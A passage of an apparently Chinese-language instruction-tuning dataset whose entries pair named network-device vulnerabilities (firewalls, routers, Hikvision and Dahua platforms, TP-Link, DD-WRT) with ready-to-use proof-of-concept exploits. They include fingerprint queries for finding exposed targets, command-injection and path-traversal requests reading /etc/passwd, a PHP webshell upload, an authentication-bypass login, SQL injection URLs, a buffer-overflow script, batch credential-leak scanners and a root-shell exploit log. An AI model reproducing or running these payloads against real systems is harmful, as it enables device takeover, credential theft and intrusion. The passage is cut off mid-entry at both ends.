"file_path": "网络设备漏洞/网神 下一代极速防火墙 pki_file_download 任意文件读取漏洞.md"}
    360. 

  360. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:三星 WLAN AP WEA453e路由器 远程命令执行漏洞\n漏洞描述:三星 WLAN AP WEA453e路由器 存在远程命令执行漏洞,可在未授权的情况下执行任意命令获取服务器权限。\n影响版本:``` 三星 WLAN AP WEA453e路由器 ```\n网络测绘:``` title==\"Samsung WLAN AP\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 三星 WLAN AP WEA453e路由器\n2. title==\"Samsung WLAN AP\"\n3. POST /(download)/tmp/a.txt HTTP/1.1\nHost: 175.199.182.152\nConnection: close\nContent-Length: 48\n\ncommand1=shell:cat /etc/passwd| dd of=/tmp/a.txt\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/三星 WLAN AP WEA453e路由器 远程命令执行漏洞.md"}
    361. 

  361. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:博华网龙防火墙 users.xml 未授权访问\n漏洞描述:博华网龙防火墙 users.xml文件 可被任意用户读取,其中包含登录的账号密码\n影响版本:``` 博华网龙防火墙 ```\n网络测绘:``` \"博华网龙防火墙\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. /xml/users.xml\n2. 验证POC, 读取配置文件获取密码的Md5\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/博华网龙防火墙 users.xml 未授权访问.md"}
    362. 

  362. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:rConfig ajaxArchiveFiles.php 后台远程命令执行漏洞\n漏洞描述:rConfig ajaxArchiveFiles.php文件中由于对path参数和ext参数进行命令拼接,导致攻击者可以远程命令执行获取服务器权限\n影响版本:``` rConfig ```\n网络测绘:``` app=\"rConfig\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"rConfig\"\n2. <?php\nrequire_once(\"/home/rconfig/classes/usersession.class.php\");\nrequire_once(\"/home/rconfig/classes/ADLog.class.php\");\nrequire_once(\"/home/rconfig/config/functions.inc.php\");\n$log = ADLog::getInstance();\nif (!$session->logged_in) {\n    echo 'Don\\'t bother trying to hack me!!!!!<br /> This hack attempt has been logged';\n    $log->Warn(\"Security Issue: Some tried to access this file directly from IP: \" . $_SERVER['REMOTE_ADDR'] . \" & Username: \" . $session->username . \" (File: \" . $_SERVER['PHP_SELF'] . \")\");\n    // need to add authentication to this script\n    header(\"Location: \" . $config_basedir . \"login.php\");\n} else {\n//archive logs files\n    $mainPath = $_GET['path'];\n    $archiveMainPath = $mainPath . \"archive/\";\n    $ext = \"*.\" . $_GET['ext'];\n    $fullpath = $mainPath . $ext;\n// create and archive dir if not already created\n    if (!is_dir($archiveMainPath)) {\n        mkdir(\"$archiveMainPath\");\n    }\n    $today = date(\"Ymd\");\n    $commandString = \"sudo -u apache zip -r -j \" . $archiveMainPath . \"filename\" . $today . \".zip \" . $mainPath . $ext;\n    exec($commandString);\n    foreach (glob($fullpath) as $v) {\n        unlink($v);\n    }\n\n    $fileCount = count(glob($mainPath . $ext));\n\n    if ($fileCount > 0) {\n        $response = json_encode(array(\n            'failure' => true\n        ));\n    } else {\n        $response = json_encode(array(\n            'success' => true\n        ));\n    }\n    echo $response;\n}  // end session check\n3. $mainPath = $_GET['path'];\n    $archiveMainPath = $mainPath . \"archive/\";\n    $ext = \"*.\" . $_GET['ext'];\n    $fullpath = $mainPath . $ext;\n// create and archive dir if not already created\n    if (!is_dir($archiveMainPath)) {\n        mkdir(\"$archiveMainPath\");\n    }\n    $today = date(\"Ymd\");\n    $commandString = \"sudo -u apache zip -r -j \" . $archiveMainPath . \"filename\" . $today . \".zip \" . $mainPath . $ext;\n    exec($commandString);\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/rConfig ajaxArchiveFiles.php 后台远程命令执行漏洞.md"}
    363. 

  363. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:TP-Link AC1750 预认证远程代码执行漏洞CVE-2021-27246\n漏洞描述:在TP-Link AC1750的tdpServer守护程序中存在漏洞,没有检查json数据的大小,导致了缓冲区溢出,通过缓冲区溢出,可以导致代码执行。 参考阅读: - https://www.synacktiv.com/publications/pwn2own-tokyo-2020-defeating-the-tp-link-ac1750.html\n网络测绘:``` app=\"TP_LINK-AC1750\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-27246\n【POC利用方法】\n1. app=\"TP_LINK-AC1750\"\n2. $ bash exploit.sh \n[+] Launching web server for distribution of pwn.sh\nServing HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...\nINFO:tdpwn:Associating 49 onemesh clients...\nINFO:tdpwn:Done!\n    And wait for 80 seconds...\n80 seconds left...\n70 seconds left...\n60 seconds left...\n50 seconds left...\n40 seconds left...\n30 seconds left...\n20 seconds left...\n10 seconds left...\n[+] Trying to exploit the tddp injection\nINFO:tdp:Preparing tddpv1_configset payload\nINFO:tdp:Sending payload\n\n[+] Trying the root shell (Low probability of success...)\nnc -v 192.168.0.1 12345\nnc: connect to 192.168.0.1 port 12345 (tcp) failed: Connection refused\n\n[ ] If shell hasn't succeed, don't worry, we retry \n\nINFO:tdpwn:Associating 49 onemesh clients...\nINFO:tdpwn:Done!\n    And wait for 80 seconds...\n80 seconds left...\n70 seconds left...\n60 seconds left...\n50 seconds left...\n40 seconds left...\n30 seconds left...\n20 seconds left...\n10 seconds left...\n[+] Trying to exploit the tddp injection\nINFO:tdp:Preparing tddpv1_configset payload\nINFO:tdp:Sending payload\n192.168.0.1 - - [30/Nov/2020 12:10:59] \"GET /pwn.sh HTTP/1.1\" 200 -\n\n[+] Trying the root shell (High probability of success...)\nnc -v 192.168.0.1 12345\nConnection to 192.168.0.1 12345 port [tcp/*] succeeded!\nuname -a\nLinux ArcherA7v5 3.3.8 #1 Mon Sep 14 19:52:46 CST 2020 mips GNU/Linux\nid\nuid=0(root) gid=0(root)\n^C[-] Stopping Webserver, now\nTerminated\n3. - https://www.synacktiv.com/publications/pwn2own-tokyo-2020-defeating-the-tp-link-ac1750.html\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/TP-Link AC1750 预认证远程代码执行漏洞 CVE-2021-27246.md"}
    364. 

  364. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:网康 下一代防火墙 HeartBeat.php 远程命令执行漏洞\n漏洞描述:网康 下一代防火墙 HeartBeat.php文件存在远程命令执行漏洞,攻击者通过构造请求包即可获取服务器Root权限\n影响版本:``` 奇安信 网康下一代防火墙 ```\n网络测绘:``` app=\"网康科技-下一代防火墙\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 奇安信 网康下一代防火墙\n2. app=\"网康科技-下一代防火墙\"\n3. public function delTestFile($fileName){\n\t    if(dirname($fileName) == '/var/www/tmp'){\n\t\t$cmd = \"/bin/rm -f {$fileName}\";\n\t\tputenv(\"CMD=$cmd\");\n\t\t$msg = shell_exec('/var/www/html/scripts/exec_cmd');\n\t    }\n\t    return time();\n\t}\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/网康 下一代防火墙 HeartBeat.php 远程命令执行漏洞.md"}
    365. 

  365. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:网御 Leadsec ACM管理平台 importhtml.php 远程命令执行漏洞\n漏洞描述:网御 Leadsec ACM管理平台 importhtml.php文件存在SQL注入导致 远程命令执行漏洞\n影响版本:``` 网御 Leadsec ACM管理平台 ```\n网络测绘:``` title=\"Leadsec ACM-管理平台\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 网御 Leadsec ACM管理平台\n2. title=\"Leadsec ACM-管理平台\"\n3. <?php \ninclude_once(\"global.func.php\");\nif($_SESSION['language']!=\"english\")\n{\n\trequire_once (\"include/language_cn.php\");\n}\nelse \n{\n\trequire_once (\"include/language_en.php\");\n}\n\nif(isset($_GET['type'])) $get_type = $_GET['type'];\nif(isset($_GET['tab'])) $get_tab = $_GET['tab'];\nif(isset($_GET['sql'])) $get_sql = $_GET['sql'];\n\nif($get_type == \"exporthtmlpost\")\t\n{\n\t$get_tab = $arr_export_cn[$get_tab];\n\texportHtml(\"$get_tab\",stripslashes(base64_decode($get_sql)));\n}\nelseif($get_type == \"exporthtmlchat\")\t\n{\n\t$get_tab = $arr_export_cn[$get_tab];\n\texportHtmlChat(\"$get_tab\",stripslashes(base64_decode($get_sql)));\n}\nelseif($get_type == \"exporthtmlmail\")\t\n{\n\t$get_tab = $arr_export_cn[$get_tab];\n\texportHtmlMail(\"$get_tab\",stripslashes(base64_decode($get_sql)));\n}\nelseif($get_type == \"exporthtmlwebsend\")\t\n{\n\t$get_tab = $arr_export_cn[$get_tab];\n\texportHtmlWebSend(\"$get_tab\",stripslashes(base64_decode($get_sql)));\n}\nelseif($get_type == \"exporthtmlwebrecv\")\t\n{\n\t$get_tab = $arr_export_cn[$get_tab];\n\texportHtmlWebRecv(\"$get_tab\",stripslashes(base64_decode($get_sql)));\n}\n?>\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/网御 Leadsec ACM管理平台 importhtml.php 远程命令执行漏洞.md"}
    366. 

  366. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:绿盟 NF下一代防火墙 任意文件上传漏洞\n漏洞描述:绿盟 SSLVPN 存在任意文件上传漏洞,攻击者通过发送特殊的请求包可以获取服务器权限,进行远程命令执行\n影响版本:绿盟 SSLVPN\n网络测绘:``` app=\"NSFOCUS-下一代防火墙\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"NSFOCUS-下一代防火墙\"\n2. POST /api/v1/device/bugsInfo HTTP/1.1\nContent-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9\nHost: \n\n--1d52ba2a11ad8a915eddab1a0e85acd9\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\n\nlang|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\n\n--1d52ba2a11ad8a915eddab1a0e85acd9--\n3. POST /api/v1/device/bugsInfo HTTP/1.1\nContent-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef\nHost: \n\n--4803b59d015026999b45993b1245f0ef\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\n\n\n<?php eval($_POST['cmd']);?>\n\n--4803b59d015026999b45993b1245f0ef--\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/绿盟 NF下一代防火墙 任意文件上传漏洞.md"}
    367. 

  367. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:HIKVISION 综合安防管理平台 report 任意文件上传漏洞\n漏洞描述:HiKVISION 综合安防管理平台 report接口存在任意文件上传漏洞,攻击者通过构造特殊的请求包可以上传任意文件,获取服务器权限\n影响版本:HiKVISION 综合安防管理平台\n网络测绘:``` app=\"HIKVISION-综合安防管理平台\" ``` ``` web.title==\"综合安防管理平台\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"HIKVISION-综合安防管理平台\"\n2. web.title==\"综合安防管理平台\"\n3. WEB-INF/classes/com/hikvision/svm/controller/ExternalController.class\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/HIKVISION 综合安防管理平台 report 任意文件上传漏洞.md"}
    368. 

  368. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:DD-WRT UPNP缓冲区溢出漏洞 CVE-2021-27137\n漏洞描述:默认情况下,DD-WRT中的UPNP处于禁用状态,并且仅在内部网络接口上侦听。 UPNP本质上是未经身份验证的UDP形式的协议–由于无法对协议强制执行身份验证,因此它既易于使用又具有不安全。 如果DD-WRT启用了UPNP服务,则坐在存在DD-WRT设备的LAN上的远程攻击者可以通过发送一个过长的`uuid`值来触发缓冲区溢出。 根据部署DD-WRT的平台的不同,可能存在缓解措施,也可能没有缓解措施,例如ASLR等,这使得可利用性取决于安装DD-WRT的平台。\n影响版本:``` DD-WRT < 45723 版本 ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-27137\n【POC利用方法】\n1. DD-WRT < 45723 版本\n2. import socket\ntarget_ip = \"192.168.15.124\" # IP Address of Target\noff = \"D\"*164\nret_addr = \"AAAA\" \npayload = off + ret_addr\npacket = \\\n    'M-SEARCH * HTTP/1.1\\r\\n' \\\n    'HOST:239.255.255.250:1900\\r\\n' \\\n    'ST:uuid:'+payload+'\\r\\n' \\\n    'MX:2\\r\\n' \\\n    'MAN:\"ssdp:discover\"\\r\\n' \\\n    '\\r\\n'\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\ns.sendto(packet.encode(), (target_ip, 1900) )\n3. 'M-SEARCH * HTTP/1.1\\r\\n' \\\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/DD-WRT UPNP缓冲区溢出漏洞 CVE-2021-27137.md"}
    369. 

  369. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Teleport堡垒机 do-login 任意用户登录漏洞\n漏洞描述:Teleport堡垒机存在任意用户登录漏洞,攻击者通过构造特殊的请求包可以登录堡垒机获取其他系统权限\n影响版本:``` Teleport Version <= 20220817 ```\n网络测绘:``` app=\"TELEPORT堡垒机\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. Teleport Version <= 20220817\n2. app=\"TELEPORT堡垒机\"\n3. POST /auth/do-login\n\nargs={\"type\":2,\"username\":\"admin\",\"password\":null,\"captcha\":\"ykex\",\"oath\":\"\",\"remember\":false}\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Teleport堡垒机 do-login 任意用户登录漏洞.md"}
    370. 

  370. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:TVT数码科技 NVMS-1000 路径遍历漏洞\n漏洞描述:TVT数码科技 TVT NVMS-1000是中国TVT数码科技公司的一套网络监控视频管理系统。 TVT数码科技 TVT NVMS-1000中存在路径遍历漏洞。远程攻击者可通过发送包含/../的特制URL请求利用该漏洞查看系统上的任意文件\n影响版本:``` TVT NVMS-1000 ```\n网络测绘:``` app=\"TVT-NVMS-1000\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. TVT NVMS-1000\n2. app=\"TVT-NVMS-1000\"\n3. GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1\nHost: \nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nConnection: close\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/TVT数码科技 NVMS-1000 路径遍历漏洞.md"}
    371. 

  371. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:锐捷 RG-UAC 账号密码信息泄露 CNVD-2021-14536\n漏洞描述:锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台\n影响版本:``` 锐捷RG-UAC统一上网行为管理审计系统 ```\n网络测绘:``` title=\"RG-UAC登录页面\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 锐捷RG-UAC统一上网行为管理审计系统\n2. title=\"RG-UAC登录页面\"\n3. import requests\nimport sys\nimport random\nimport re\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\ndef title():\n    print('+------------------------------------------')\n    print('+  \\033[34mPOC_Des: http://wiki.peiqi.tech                                   \\033[0m')\n    print('+  \\033[34mGithub : https://github.com/PeiQi0                                 \\033[0m')\n    print('+  \\033[34m公众号 : PeiQi文库                                                     \\033[0m')\n    print('+  \\033[34mVersion: 锐捷RG-UAC统一上网行为管理审计系统                             \\033[0m')\n    print('+  \\033[36m使用格式:  python3 poc.py                                            \\033[0m')\n    print('+  \\033[36mFile         >>> ip.txt                             \\033[0m')\n    print('+------------------------------------------')\n\ndef POC_1(target_url):\n    vuln_url = target_url\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\",\n    }\n    try:\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)\n        if \"super_admin\" in response.text and \"password\" in response.text and response.status_code == 200:\n            print(\"\\033[32m[o] 目标 {}存在漏洞 ,F12查看源码获取密码md5值 \\033[0m\".format(target_url))\n        else:\n            print(\"\\033[31m[x] 目标 {}不存在漏洞 \\033[0m\".format(target_url))\n    except Exception as e:\n        print(\"\\033[31m[x] 目标 {}不存在漏洞 \\033[0m\".format(target_url))\n\ndef Scan(file_name):\n    with open(file_name, \"r\", encoding='utf8') as scan_url:\n        for url in scan_url:\n            if url[:4] != \"http\":\n                url = \"http://\" + url\n            url = url.strip('\\n')\n            try:\n                POC_1(url)\n\n            except Exception as e:\n                print(\"\\033[31m[x] 请求报错 \\033[0m\".format(e))\n                continue\n\nif __name__ == '__main__':\n    title()\n    file_name  = str(input(\"\\033[35mPlease input Attack File\\nFile >>> \\033[0m\"))\n    Scan(file_name)\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/锐捷 RG-UAC 账号密码信息泄露 CNVD-2021-14536.md"}
    372. 

  372. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:宏电 H8922 后台管理员信息泄露漏洞 CVE-2021-28151\n漏洞描述:宏电 H8922 后台存在管理员信息泄露漏洞,攻击者使用任意账号登录后访问特殊的Url即可获取所有用户的账号和密码\n影响版本:``` 宏电 H8922 ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-28151\n【POC利用方法】\n1. app:\"Hongdian H8922 Industrial Router\"\n2. import requests\nimport sys\nimport random\nimport re\nimport base64\nimport time\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\ndef title():\n    print('+------------------------------------------')\n    print('+  \\033[34mPOC_Des: http://wiki.peiqi.tech                                   \\033[0m')\n    print('+  \\033[34mGithub : https://github.com/PeiQi0                                 \\033[0m')\n    print('+  \\033[34m公众号  : PeiQi文库                                                   \\033[0m')\n    print('+  \\033[34mTitle  : 宏电 H8922 后台管理员信息泄露漏洞 CVE-2021-28151                  \\033[0m')\n    print('+  \\033[36m使用格式:  python3 poc.py                                            \\033[0m')\n    print('+  \\033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \\033[0m')\n    print('+------------------------------------------')\n\ndef POC_1(target_url):\n    vuln_url = target_url + \"/backup2.cgi\"\n    headers = {\n        \"Content-Type\": \"application/x-www-form-urlencoded\",\n        \"Authorization\": \"Basic Z3Vlc3Q6Z3Vlc3Q=\"\n    }\n    try:\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        response = requests.post(url=vuln_url, headers=headers, verify=False, timeout=5)\n        print(\"\\033[36m[o] 正在请求 {}/backup2.cgi.... \\033[0m\".format(target_url))\n        if 'service webadmin' in response.text and response.status_code == 200:\n            print(\"\\033[32m[o] 目标 {}存在漏洞 ,存在访客账号 guest/guest 成功读取配置文件 \\033[0m\".format(target_url))\n            print(\"\\033[36m[o] 响应为:\\n{} \\033[0m\".format(response.text))\n        else:\n            print(\"\\033[31m[x] 请求失败 \\033[0m\")\n            sys.exit(0)\n\n    except Exception as e:\n        print(\"\\033[31m[x] 请求失败 \\033[0m\", e)\n\n\nif __name__ == '__main__':\n    title()\n    target_url = str(input(\"\\033[35mPlease input Attack Url\\nUrl >>> \\033[0m\"))\n    POC_1(target_url)\n3. def POC_1(target_url):\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/宏电 H8922 后台管理员信息泄露漏洞 CVE-2021-28151.md"}
    373. 

  373. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:百卓 Patflow showuser.php 后台SQL注入漏洞\n漏洞描述:百卓 Patflow showuser.php文件参数过滤不充分,导致后台存在SQL注入漏洞\n影响版本:``` 百卓 Patflow ```\n网络测绘:``` \"Patflow\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. /user/showuser.php?id=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,(select%20group_concat(SCHEMA_NAME)%20f\n2. 存在漏洞的文件为 shwouser.php,验证POC为\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/百卓 Patflow showuser.php 后台SQL注入漏洞.md"}
    374. 

  374. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544\n漏洞描述:杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞,攻击者可利用该漏洞登录后台通过文件遍历漏洞获取敏感信息\n影响版本:``` HIKVISION 流媒体管理服务器 ```\n网络测绘:``` \"杭州海康威视系统技术有限公司 版权所有\" && title=\"流媒体管理服务器\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. HIKVISION 流媒体管理服务器\n2. \"杭州海康威视系统技术有限公司 版权所有\" && title=\"流媒体管理服务器\"\n3. http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544.md"}
    375. 

  375. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:才茂通信 网关 formping 远程命令执行漏洞\n漏洞描述:才茂通信网关 formping 接口存在远程命令执行漏洞,攻击者通过默认口令 admin/admin 登陆系统后通过命令可以获取服务器权限\n影响版本:``` 才茂通信 网关 ```\n网络测绘:``` app=\"CAIMORE-Gateway\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"CAIMORE-Gateway\"\n2. POST /goform/formping\nAuthorization: Basic YWRtaW46YWRtaW4=\n\nPingAddr=www.baidu.com%7Cls&PingPackNumb=1&PingMsg=\n3. Authorization: Basic YWRtaW46YWRtaW4=\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/才茂通信 网关 formping 远程命令执行漏洞.md"}
    376. 

  376. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:悦泰节能 智能数据网关 resources 任意文件读取漏洞\n漏洞描述:悦泰节能 智能数据网关存在任意文件读取漏洞,通过构造特殊请求可以读取服务器任意文件\n影响版本:``` 悦泰节能 智能数据网关 ```\n网络测绘:``` body=\"/FWlib3/resources/css/xtheme-gray.cssz\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 悦泰节能 智能数据网关\n2. body=\"/FWlib3/resources/css/xtheme-gray.cssz\"\n3. /FWlib3/resources//../../../../../../../../etc/passwd\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/悦泰节能 智能数据网关 resources 任意文件读取漏洞.md"}
    377. 

  377. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313\n漏洞描述:蜂网互联企业级路由器v4.31存在接口未授权访问,导致攻击者可以是通过此漏洞得到路由器账号密码接管路由器\n影响版本:``` 蜂网互联企业级路由器v4.31 ```\n网络测绘:``` app=\"蜂网互联-互联企业级路由器\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2019-16313\n【POC利用方法】\n1. 蜂网互联企业级路由器v4.31\n2. app=\"蜂网互联-互联企业级路由器\"\n3. import requests\nimport sys\nimport random\nimport re\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\ndef title():\n    print('+------------------------------------------')\n    print('+  \\033[34mPOC_Des: http://wiki.peiqi.tech                                   \\033[0m')\n    print('+  \\033[34mVersion: DrayTek企业网络设备                                        \\033[0m')\n    print('+  \\033[36m使用格式:  python3 poc.py                                            \\033[0m')\n    print('+  \\033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \\033[0m')\n    print('+------------------------------------------')\n\ndef POC_1(target_url):\n    vuln_url = target_url + \"/action/usermanager.htm\"\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\",\n    }\n    try:\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)\n        print(\"\\033[32m[o] 正在请求 {}/action/usermanager.htm \\033[0m\".format(target_url))\n        if \"pwd\" in response.text and response.status_code == 200:\n            print(\"\\033[32m[o] 目标 {}存在漏洞 \\033[0m\".format(target_url))\n            print(\"\\033[32m[o] 响应为:\\n{} \\033[0m\".format(response.text))\n        else:\n            print(\"\\033[31m[x] 不存在漏洞 \\033[0m\")\n            sys.exit(0)\n    except Exception as e:\n        print(\"\\033[31m[x] 请求失败 \\033[0m\", e)\n        sys.exit(0)\n\n\n\nif __name__ == '__main__':\n    title()\n    target_url = str(input(\"\\033[35mPlease input Attack Url\\nUrl >>> \\033[0m\"))\n    POC_1(target_url)\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313.md"}
    378. 

  378. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:锐捷 EG易网关 phpinfo.view.php 信息泄露漏洞\n漏洞描述:锐捷EG易网关 部分版本 phpinfo.view.php文件权限设定存在问题,导致未经身份验证获取敏感信息\n影响版本:``` 锐捷EG易网关 ```\n网络测绘:``` app=\"Ruijie-EG易网关\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"Ruijie-EG易网关\"\n2. /tool/view/phpinfo.view.php\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/锐捷 EG易网关 phpinfo.view.php 信息泄露漏洞.md"}
    379. 

  379. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:大华 智慧园区综合管理平台 user_save.action 任意文件上传漏洞\n漏洞描述:大华 智慧园区综合管理平台存在未授权访问漏洞,攻击者通过构造特殊的请求包可以创建新用户,再利用文件上传漏洞获取服务器权限\n影响版本:大华 智慧园区综合管理平台\n网络测绘:``` app=\"dahua-智慧园区综合管理平台\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"dahua-智慧园区综合管理平台\"\n2. POST /admin/user_save.action HTTP/1.1\nHost: \nAccept-Encoding: gzip\nContent-Length: 914\nContent-Type: multipart/form-data; boundary=----fxwrpqcy\nCookie: JSESSIONID=65A8F19555DC1EFB09B5A8B4F0F6921C\nUser-Agent: Go-http-client/1.1\n\n------fxwrpqcy\nContent-Disposition: form-data; name=\"userBean.userType\"\n\n0\n------fxwrpqcy\nContent-Disposition: form-data; name=\"userBean.ownerCode\"\n\n001\n------fxwrpqcy\nContent-Disposition: form-data; name=\"userBean.isReuse\"\n\n0\n------fxwrpqcy\nContent-Disposition: form-data; name=\"userBean.macStat\"\n\n0\n------fxwrpqcy\nContent-Disposition: form-data; name=\"userBean.roleIds\"\n\n1\n------fxwrpqcy\nContent-Disposition: form-data; name=\"userBean.loginName\"\n\nluqaahkf\n------fxwrpqcy\nContent-Disposition: form-data; name=\"displayedOrgName\"\n\nluqaahkf\n------fxwrpqcy\nContent-Disposition: form-data; name=\"userBean.loginPass\"\n\nlhndpuxl\n------fxwrpqcy\nContent-Disposition: form-data; name=\"checkPass\"\n\nlhndpuxl\n------fxwrpqcy\nContent-Disposition: form-data; name=\"userBean.groupId\"\n\n0\n------fxwrpqcy\nContent-Disposition: form-data; name=\"userBean.userName\"\n\nluqaahkf\n------fxwrpqcy--\n3. POST /WPMS/getPublicKey HTTP/1.1\nHost: \nAccept-Encoding: gzip\nContent-Length: 25\nContent-Type: application/json\nUser-Agent: 